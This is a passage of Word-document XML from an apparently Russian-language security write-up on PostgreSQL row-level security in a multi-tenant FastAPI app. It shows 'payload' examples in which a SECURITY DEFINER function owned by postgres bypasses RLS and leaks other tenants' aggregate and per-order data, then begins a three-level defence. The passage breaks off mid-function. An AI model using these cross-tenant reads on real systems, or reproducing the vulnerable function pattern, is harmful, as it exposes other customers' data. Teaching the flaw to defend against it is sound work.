        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/orders/summary/{status}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def order_summary(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status: str,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_tenant_session),</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 Любой tenant вызывает функцию</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT * FROM app.get_order_summary(:s)"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"s": status},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return dict(result.first()._mapping)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — cross-tenant aggregate exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /orders/summary/completed (JWT tenant_42)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. application_user сессия с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET jwt.tenant_id = '42'</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2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT app.get_order_summary('completed')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функция SECURITY DEFINER.</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Context switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: внутри функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_user = postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (owner функции).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT count(*), sum(amount) FROM app.orders WHERE status = 'completed'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current_user = postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = owner таблицы app.orders.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RLS bypass для owner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (потому что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не включён).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SELECT возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL orders в БД</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, независимо от tenant_id.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Aggregate count + sum — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">по всем tenants</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не только tenant 42.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: total_count и total_amount </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">по всей БД</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. tenant_42 видит aggregate стат всех tenants, в частности total revenue компании.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (внутри функции):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Caller-side:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT app.get_order_summary('completed');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ caller: application_user (tenant 42 context)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Внутри функции (SECURITY DEFINER → current_user = postgres):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT count(*), COALESCE(sum(amount), 0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM app.orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE status = 'completed';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ current_user = postgres (owner таблицы) → RLS bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ возвращает ВСЕ rows app.orders → cross-tenant aggregate leak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативный payload — direct read через row-level SECURITY DEFINER</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Ещё более прямой пример: SD-функция возвращающая row-level data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE FUNCTION app.get_order_details(p_order_id int)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS app.orders LANGUAGE plpgsql SECURITY DEFINER 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result app.orders;</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SELECT * INTO result FROM app.orders WHERE id = p_order_id;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</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Атакующий вызывает с произвольным order_id из другого tenant:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM app.get_order_details(99999);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ owner функции = postgres → bypass RLS → возвращает order независимо от tenant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита — три уровня</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уровень 1 — `FORCE ROW LEVEL SECURITY` на таблицу:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE app.orders FORCE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 Теперь даже owner (postgres, superuser) подвержен RLS-policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- SECURITY DEFINER функция должна явно set tenant_id или fail RLS check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уровень 2 — явный фильтр внутри SD-функции:</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app.get_order_summary_safe(p_status text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS TABLE(total_count bigint, total_amount numeric)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plpgsql SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path = pg_catalog, pg_temp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AS $$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    caller_tenant int;</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 Явная проверка caller-tenant из session-variable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    caller_tenant := current_setting('jwt.tenant_id', true)::int;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF caller_tenant IS NULL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'caller tenant not set';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</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RETURN QUERY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
